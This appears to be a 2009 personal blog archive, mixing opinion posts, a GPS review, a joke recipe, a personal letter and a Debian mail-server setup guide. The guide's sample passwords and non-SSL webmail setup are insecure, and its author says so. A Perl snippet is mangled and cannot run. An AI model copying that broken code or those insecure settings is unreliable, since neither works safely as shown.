I think these self-serving atheists would do well to actually make friends with some Christians and see how that goes. The Christians that I know are fallible people who have found something that guides them toward being a better person and helping those in their community. The news reports child molestations, prayer in place of medical services, and other ways that any religion can be used incorrectly. But the news also reports terrorist bombings, natural catastrophes, and disease outbreaks. If any of these things were commonplace they would be normal and not newsworthy. You seldom see a news report about a school bus that collects all the children and gets to school without incident because that is what normally happens - it’s what you would expect. In the same vein, most Christians are normal, boring people who do normal, boring things except they try to better their lives and the lives of those around them.



I suspect a lot of loud-mouth atheists who like to tell others that those people’s beliefs are false on the Internet are really closet atheists. On the Internet they’re happy to spout off about their intellectual superiority. I bet when they’re with their friends who aren’t atheists they keep their mouths shut because they know that such behavior is asshole behavior. They’re content to be an asshole on the Internet when no one knows who they are but in person they’re afraid of being a dick (which they would be).



To the smarter-than-thou atheists I issue this challenge: prove that atheism brings more benevolence on a door-to-door basis than any major religion. I don’t think I’ve ever heard of an atheist bake sale to raise money for a local school. PTA bake sales seem to do that just fine without religious dogma attached. Personally I believe that religion is like color, gender, and nationality in that it has less to do with one’s behavior than a person is raised and their own character.

Monday, July 6, 2009

Hello World JAPH

This is my first JAPH although it prints hello world! instead. I wrote it for this because I like challenges.



This type of JAPH has probably already been done but it was fun to do.




#!/usr/bin/perl
use warnings;
use strict;
open my $fh,';
$self =~ s/[^a-z !]//g;
print map { substr($self,$_,1) } qw(42 8 62 10 55 26 15 33 9 -46 47 0);


I got Win #44.

Tuesday, June 30, 2009

Passive-Aggressive SSIDs

IllBroadcastOnMyAPWhatImScaredToTellYouInPerson



IAMLAME
I’ve seen a number of these on time waster blogs like Digg and reddit. Unfortunately this is the only one I had the presence of mind to save a link for.



How lame is that? Your neighbors are loud on their balcony. Your neighbors are loud having sex. You know what they’ll do if they see this? They will be louder because all you’ll do is change your WiFi SSID to something even more lame.



You want to have a sense of smug satisfaction and have the problem stop? Walk up to their door and knock on it. Politely ask them to be more quiet. You don’t even have to threaten to call the cops. If they’re having a party they might even invite you in, especially if you bring good beer like New Castle or Fat Tire.



But all stuff like this does is show how you’re not actually going to do anything about the problem.

Saturday, June 27, 2009

Garmin nuvi 265WT

I bought an automotive GPS unit a couple days ago <masculine>so my girlfriend won’t get lost</masculine>. Specifically I got a Garmin nuvi 265WT. This thing is very nice.



The mounting is a mechanical suction cup with a arm featuring a ball on the end. The ball goes into a socket on the device holding clip. The suction cup has a great grip on my windshield (and kitchen counter) and the ball and socket is easy enough to move without being loose. Once I figured out that you put the GPS into the clip bottom-first I found that it’s easy to pop in and out.



It took about five minutes for it to initially get its bearings (nyuck, nyuck) sitting on an outside table on a cloudless day. Once it figured out where it was it’s been solid for location.



The navigation is easy to use and with the preloaded maps it only makes you type until there are only a few possible cities, streets, etc for you to choose from. It allows you to save locations and one location can be saved as “home”. When you go to select a destination there’s a great big “Go Home” button that makes it easy to get to your most common destination.



I found the turn by turn with street names to be excellent. After you make a turn it tells you how far a head you need to do something and what you need to do. When you’re almost there it lets you know and again when you’re there. The former seems to give you enough time to get into the proper lane. When I was on the freeway approaching my exit it spoke more frequently but not often enough to become annoying. It did pronounce La Jolla (Lah Hoya) as Lay Jollah but since it was the American English voice and not Spanish it’s understandable.



Wonder of wonders it came with a USB cable. I plugged it in and went to the website to see what was available. They had a simple to use tool to get system updates and a tool to download additional vehicle models and voices. The vehicle model is the image of your vehicle drawn on the street. According to our GPS we are actually driving a tank and not a Matrix. This is useless, but fun. I was surprised to find that in addition to the SD card reader the thing has 2GB of built-in flash. Most of this is taken up with software and maps but there was like 600MB free. That’s a lot of room for saved routes and waypoints.



Another feature of this is built-in bluetooth speakerphone-ness. After a little fiddling I had it paired with my girlfriends nV2. I could use the speakerphone to access the nV2’s built in voice dialing. Very nice. The speaker quality wasn’t outstanding but it was easy to understand the other person and when I was outside the car on my iPhone handset I though the nuvi’s microphone pickup was very good.



I haven’t used it a ton yet but so far I feel like I definitely go my money’s worth. I would recommend this to anyone interested in an in-car GPS, especially if they have a bluetooth enabled phone.

Garmin nuvi 265WT

I bought an automotive GPS unit a couple days ago <masculine>so my girlfriend won’t get lost</masculine>. Specifically I got a Garmin nuvi 265WT. This thing is very nice.



The mounting is a mechanical suction cup with a arm featuring a ball on the end. The ball goes into a socket on the device holding clip. The suction cup has a great grip on my windshield (and kitchen counter) and the ball and socket is easy enough to move without being loose. Once I figured out that you put the GPS into the clip bottom-first I found that it’s easy to pop in and out.



It took about five minutes for it to initially get its bearings (nyuck, nyuck) sitting on an outside table on a cloudless day. Once it figured out where it was it’s been solid for location.



The navigation is easy to use and with the preloaded maps it only makes you type until there are only a few possible cities, streets, etc for you to choose from. It allows you to save locations and one location can be saved as “home”. When you go to select a destination there’s a great big “Go Home” button that makes it easy to get to your most common destination.



I found the turn by turn with street names to be excellent. After you make a turn it tells you how far a head you need to do something and what you need to do. When you’re almost there it lets you know and again when you’re there. The former seems to give you enough time to get into the proper lane. When I was on the freeway approaching my exit it spoke more frequently but not often enough to become annoying. It did pronounce La Jolla (Lah Hoya) as Lay Jollah but since it was the American English voice and not Spanish it’s understandable.



Wonder of wonders it came with a USB cable. I plugged it in and went to the website to see what was available. They had a simple to use tool to get system updates and a tool to download additional vehicle models and voices. The vehicle model is the image of your vehicle drawn on the street. According to our GPS we are actually driving a tank and not a Matrix. This is useless, but fun. I was surprised to find that in addition to the SD card reader the thing has 2GB of built-in flash. Most of this is taken up with software and maps but there was like 600MB free. That’s a lot of room for saved routes and waypoints.



Another feature of this is built-in bluetooth speakerphone-ness. After a little fiddling I had it paired with my girlfriends nV2. I could use the speakerphone to access the nV2’s built in voice dialing. Very nice. The speaker quality wasn’t outstanding but it was easy to understand the other person and when I was outside the car on my iPhone handset I though the nuvi’s microphone pickup was very good.



I haven’t used it a ton yet but so far I feel like I definitely go my money’s worth. I would recommend this to anyone interested in an in-car GPS, especially if they have a bluetooth enabled phone.

Thursday, June 25, 2009

Half-game Downloads

It’s valuable to give you only half of what you paid for.



http://hellforge.gameriot.com/blogs/Hellforge/EA-Games-Everything-On-The-Disc-Is-A-Demo



So to foil pirates they’re only giving you half the game on the disk. The rest you have to download… having already paid for the game. This isn’t a patch or content update, this is content they just didn’t put on the disk.



Mr. Riccitello says:




So the point I’m making is, yes I think that’s the answer [to piracy]. And here’s the trick: it’s not the answer because this foils a pirate, but it’s the answer because it makes the service so valuable that in comparison the packaged good is not.




My thoughts:




The great thing about a game on a disk is that I can go to the store, buy it now, and play it now. The great thing about a downloadable game is that I don’t have to leave the house provided I’m willing to wait a bit.



This synergistically combines the worst aspects of both technologies.




So here’s an idea. To stop criminals we’ll sell handguns without firing pins. Then we’ll let you order the firing pin from our website at no charge. We have thus revolutionized the way people think about buying handguns and have added value to our website. Oh, and stopped criminals from getting firing pins somehow.

Wednesday, June 24, 2009

Web Log Retention

I hang out in some IRC channels to share questions and generally admire how smart I am. Sometimes parts of the discussion are worth sharing.

mnex: do access_log should be considered as confidential information ?
crunge: mnex: confidential, yes
crunge: mnex: at the very least it’s proprietary business information that helps in the analysis of the effectiveness of one’s website and marketing
crunge: mnex: business aside, your visitors probably don’t want everyone to know what they’ve been looking at.
crunge: mnex: also, sometimes URLs contain sensitive information like search terms, user names, addresses, phone numbers, etc

Sunday, June 21, 2009

Chicken Parmesan a la Kludge

Wikipedia describes a Kludge as:




A kludge (or kluge) is a workaround, an ad hoc engineering solution, a clumsy or inelegant solution to a problem, typically using parts that are cobbled together.




How could one cobble together a fancy Italian dish with random stuff?



  1. Lower your standards for Italian food, dramatically.

  2. Bake frozen chicken fingers according to their instructions.

    • I like white meat chicken fingers and since there’s no such thing as ritzy chicken fingers the ceiling is pretty low in “springing for the good stuff”.


  3. While the chicken fingers are baking microwave 1-2 cups of spaghetti sauce in a microwave safe container. I use a pyrex measuring cup. Know that hot tomato sauce will corrode tupperware.

    • Be sure to cover (not seal!) your container with something like a paper towel so it doesn’t splatter.

    • Nuke for a minute or so, stir, check the sauce temperature, not the container temperature.

    • Repeat until hot.

    • Make sure it’s good spaghetti sauce like Prego. If it’s not you can try adding powered garlic, powdered onion, allspice, pepper, etc. But you’re not going to make it awesome. Just buy the good stuff up front.


  4. Once the chicken fingers are done baking, divide evenly on your finest plastic kitchenware.

  5. Cover them uniformly with shredded mozzarella or provolone.

  6. Cover that with piping hot pasta sauce to melt the cheese.

  7. Optionally, cover with grated parmesan. Given the name “chicken paremsan” I have know idea why this is an optional step.

Serves an arbitrary number of people, depending on how much stuff you buy and how much your people eat.

Saturday, June 20, 2009

The Duel

I may have dug myself into a hole but the results of the slide down should be interesting. My first “blog” was on Freenet and my most common post was to the effect of, “Sorry I haven’t updated in a while..”. I suspect that something of that nature is the most common update to blogs. Seeing a friend make such a reference I decided to open my big fat mouth and make a challenge.



I think this might be a unique challenge on the tubes. I challenged another blogger to a duel - For each full 24 hour period that one of us has a newer post of merit the other gains a point. The first to accumulate 100 points loses. If we each make posts just under every 48 hours and they’re properly interleaved we could go on indefinitely with neither of us accumulating a point. That’s a lot of pressure but I expect it will be good for both of us and our sites.



My original challenge with a spelling correction:




I challenge you to a duel, sir. We both have blogs that have grown relatively sleepy as of late. My challenge is this: For each full day that one of us has a newer blog post of merit the other accumulates one point. The first to accumulate 100 points is the loser.



Blog posts about the duel do not count, save for the first acknowledgment of the duel from each of us. Blog posts about life events, interests, hobbies, humorous anecdotes, and relevant responses to the others’ blog posts are all of merit.



Do you accept my challenge, sir?




Let’s see how this goes.

Thursday, June 18, 2009

Virtual Mail Hosting with Postfix, Cyrus and Roundcube

My sister makes delicious fudge and sells it online through her website http://sanfordfudge.com. Being the computer geek in the family I help get it set up and deal with a little of the day to day requirements of the website. One of those requirements is that order notification emails are routed properly. As a knowledgeable Linux geek I’m undaunted by the idea of running my own mail system and would rather do that than have it hosted.



My platform of choice is Debian because of its stability and ease of management for the command-line adept. I’m providing my setup notes below with some commentary so that they might help someone else get their mail system online. These instructions should hopefully translate decently well to other distributions although the package names, config file locations, and default configuration choices are likely to be different.



I chose Postfix because it’s simple and works very well. I have experience with Sendmail and would like to keep it in the past. I chose Cyrus IMAP based on recommendations from peers. It’s my understanding that if my setup were to become more complex Cyrus would make those complex scenarios easier to implement. I chose Roundcube because it’s clean, easy to use, and has given me very few problems in the years I’ve been using it for my own mail.



These instructions are not a step-by-step guide. If you’re familiar with Linux and Debian they can probably get you through it. If not you may find some difficulty on systems other than Debian Lenny.



What’s Missing



  • SSL - I don’t explain how to set up SSL for the webmail. It is essential that you do this.

  • Spam filtering/Virus protection - Not there yet

  • SPF/Domain Keys - These are good for getting your mail through other people’s spam filters

  • Directory Services - There’s no expectation that we’ll need to coordinate on a big list of contacts, but Roundcube does have LDAP address book support

  • User’s can’t change their own passwords - not something we need

  • Other features we didn’t need.

Debian Setup



I always install Debian stripped down, with no package sets selected. In this case I’m using the latest release, Lenny (5.0). I edit my sources to include non-free and contrib. I then run apt-get update. I apt-get install sudo openssh-server vim-nox and add my normal user to the sudoers with ALL=(ALL) ALL. I log out and log in as my personal user. I install the necessary packages:




sudo apt-get install postfix ca-certificates cyrus-imapd-2.2 sasl2-bin libsasl2-modules cyrus-admin-2.2 cyrus-clients-2.2 apache2-mpm-prefork libapache2-mod-php5 php5-mysql php5-mcrypt mysql-server-5.0



Be sure to choose a good password for MySQL and install postfix as Internet Site.



Because this is a very small setup I’d prefer to use SQLite over MySQL. I’m not a MySQL fan at all. Unfortunately Debian prefers SQLite3 (which I also prefer) but Roundcube seems to only support SQLite2. Rather than hack it to make it work I’ll just make a different selection.



I download the 3.0 beta Roundcube tarball from http://roundcube.net/downloads.



Postfix needs to be in the mail group to communicate with Cyrus the way we’re using it so I add the postfix user to the mail group.



Cyrus SASL



Cyrus SASL provides saslauthd which, for our purposes, abstracts away the complexities of various authentication mechanisms to a single interface. We’re going to use a simple database file but later on it could be scaled up to use SQL, LDAP, Kerberos, or something else.



In /etc/default/saslauthd set MECHANISMS="sasldb" and START=yes. Next we need to create users and set passwords for them. Choose good passwords, particularly for the cyrus user because that is your administrative user.




sudo saslpasswd2 -c -u hostname usera
sudo saslpasswd2 -c -u hostname userb
sudo saslpasswd2 -c -u hostname cyrus
sudo /usr/sbin/sasldblistusers2
sudo /etc/init.d/saslauthd restart
sudo testsaslauthd -u usera -r hostname -p blarg


The last command allows you to ensure authentication is working. In that example usera’s password is blarg, which is a terrible password. If a user is having trouble logging in later, ensure that this works.



Cyrus IMAP



This configuration is only allowing mail access via a web-based mail service. Therefore we don’t need IMAP remotely accessible and don’t need POP or NNTP at all.



  • In imapd.conf uncomment imap_admins: cyrus

  • In cyrus.conf, SERVICES section, set the imap line to have listen=“127.0.0.1:imap”, ensure the pop and nntp lines are commented out

  • Restart cyrus

cyradm –user cyrus localhost and user the password you created for the cyrus user.




> cm user.usera
> cm user.userb
> quit


The cm command creates a mailbox. Note that the usernames are prefixed with user. and the domain is not specified. This took me some time to figure out despite the fact that the logs were telling me exactly why my mail wasn’t reaching the mailboxes.



Postfix



I made these edits to the main.cf. In your configuration make sure that if these are duplicates of existing settings that you comment out the original settings or merge them appropriately. I’m using SSL/TLS optionally so systems that support using encryption with SMTP will do so. Those that don’t will function normally. I’m using the Debian-generated Snake Oil cert. This may be a bad choice for you. Make sure you understand where your certificate and keypair came from.




# add to main.cf
virtual_transport = lmtp:unix:/var/run/cyrus/socket/lmtp
virtual_mailbox_domains = sanfordfudge.com
virtual_mailbox_maps = hash:/etc/postfix/vmailbox
virtual_alias_maps = hash:/etc/postfix/virtual



# Make sure this is in main.cf
smtpd_tls_security_level = may
smtp_tls_security_level = may
# comment out this
#smtpd_use_tls=yes


I have to create two new files in the /etc/postfix/ directory, virtual and vmailbox. Here are their contents:




# /etc/postfix/vmailbox
usera@sanfordfudge.com usera@myhostname
userb@sanfordfudge.com userb@myhostname



# /etc/postfix/virtual
inquiries@sanfordfudge.com usera@sanfordfudge.com, userb@sanfordfudge.com


I had to edit the master.cf so that postfix could properly deliver mail to Cyrus. This required telling postfix that the Unix socket being used is not inside a chroot.




# change
lmtp unix - - - - - lmtp
# to
lmtp unix - - n - - lmtp


For speed our virtual and vmailbox files are hashed databases and those databases need to be regenerated any time the source files are changed.



jason@hostname:/etc/postfix$ sudo postmap virtual vmailbox



And restart postfix.



Roundcube



This Apache configuration is actually not that great. I leave it to the reader to do something better with it. The most significant issue is that it does not include access via SSL. Since you’re sending usernames and passwords to the server you should not leave it this way. There are copious guides to getting this accomplished. Again, know what you’re doing with your certificates.



Unpack tarball into /tmp




cd /var/www
sudo mv /tmp/roundcubemail-0.3-beta/* /var/www/webmail/
cd webmail

sudo chown www-data:www-data temp logs
cd /etc/apache2/mods-enabled
sudo ln -s ../mods-available/rewrite.load .
cd ..
sudo vi sites-available/default
# Add
<Directory /var/www/webmail>
Options Indexes FollowSymLinks MultiViews
AllowOverride Indexes
Order allow,deny
allow from all
</Directory>



Remove last two lines from webmail/.htaccess
Restart apache (not reload)
mysql -u root -p

mysql> CREATE DATABASE roundcubemail /*!40101 CHARACTER SET utf8 COLLATE utf8_general_ci */;
Query OK, 1 row affected (0.00 sec)

mysql> GRANT ALL PRIVILEGES ON roundcubemail.* TO roundcube@localhost IDENTIFIED BY 'blarg';
Query OK, 0 rows affected (0.00 sec)


Visit http://whatever/webmail/installer/ and walk through the configuration.



Once everything is happy,



sudo rm -rf /var/www/webmail/installer/



At this point I’m able to log in as both users, send and receive mail (DNS is properly configured), manage my folders etc. Note that no folders were created automatically by Cyrus so I had to make them myself, at least the ones that Roundcube was looking for. I also had to create the Identities for each user but that was easy.



Conclusion



The end product is a mail system that’s simple to use, works well, and is easy to administer. New domains are added in Postfix in the main.cf, vmailbox, and virtual files (don’t forget postmap). Mailboxes are managed with cyradm. Passwords are managed with saslpasswd2.



Special thanks to directory-services ninja (among other things) subcon from slapd.info. In additional to having gone through this frontier before me, he also does things with LDAP that would require normal people to use Celtic runs and goat’s blood.

Sunday, March 1, 2009

A Letter to Patrick

I write this to you here because I don’t think you’ll be reasonable if I address you directly. You feel that we’re responsible for what’s happened to you recently and you’re committed to “causing us hell”. I must admit, I initially felt stress and frustration in dealing with your efforts to be disruptive. My emotions have changed as your efforts have persisted and what they’ve settled on is sadness.



I’d like to share this sadness with you with the hopes that you’ll see your situation from a different perspective. I used to be very angry at the world around me. I was angry about how I felt, the position I was in, and the fact that despite my greatest hopes, nothing was coming along to change that. This sense of being “stuck” compounded the anger further. I was on a path that wasn’t changing and no one was going to change it for me.



I wanted to change but I didn’t realize that it wasn’t going to just happen. Luckily, my best friend showed me the path I was on and convinced me that the source of the problem was my anger, looping back on itself. When I took responsibility for my situation I was able to start the long and arduous process of becoming free.



With this in mind I’m sad in a broad sense to see you in a similar situation, alienating those who might help you find a better path. I’m sad because I was lucky enough that I didn’t sabotage my means to breaking free and I fear that you are not so lucky.



At a more granular level, I’m saddened that we couldn’t work out our differences as mature, enlightened people. I do not, however, react positively to aggression. At best I just become dismissive but remain polite. If you had been willing to communicate we might have become friends and maybe I could help you find a better way. If the opportunity arose I don’t know that I could. That kind of insight is not my forte. But I stick by my friends and do the best I can. I’m sad that I can’t see you amongst my friends.



I’m sad that you chose to deal with your problem by attempting to bend others to your will rather than compromising. You were so blinded by anger and desire for revenge that could only thrash about and like being in quicksand only sank deeper. I’m sad because your anger controls you and keeps you from being free.



I’m sad because you’re a slave. You are a slave to your anger so you yank on your chains. Your efforts to break the chains only make you tired and make the chains heavier. I’m sad because you don’t see that your chains have no locks and its your force that keeps the retaining pin in place. Maybe one day you’ll find this sadness in yourself. Maybe you’ll let this sadness overwhelm you and quench your anger. Maybe this sadness will let you rest in the chains and with the tension relieved, they’ll simply fall off.



I don’t know if you’ll read this. I don’t think we’ll ever speak again. I would like you to know that I know what deep, ceaseless anger feels like. I sincerely hope that you can find a way out.